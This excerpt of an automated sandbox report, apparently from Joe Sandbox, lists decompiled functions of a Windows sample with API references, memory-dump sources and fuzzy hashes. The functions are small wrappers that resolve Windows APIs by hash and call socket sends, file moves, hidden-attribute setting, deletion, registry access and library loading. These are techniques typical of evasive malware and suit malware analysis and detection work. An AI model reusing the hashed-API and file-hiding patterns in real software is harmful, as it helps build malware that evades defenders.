Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

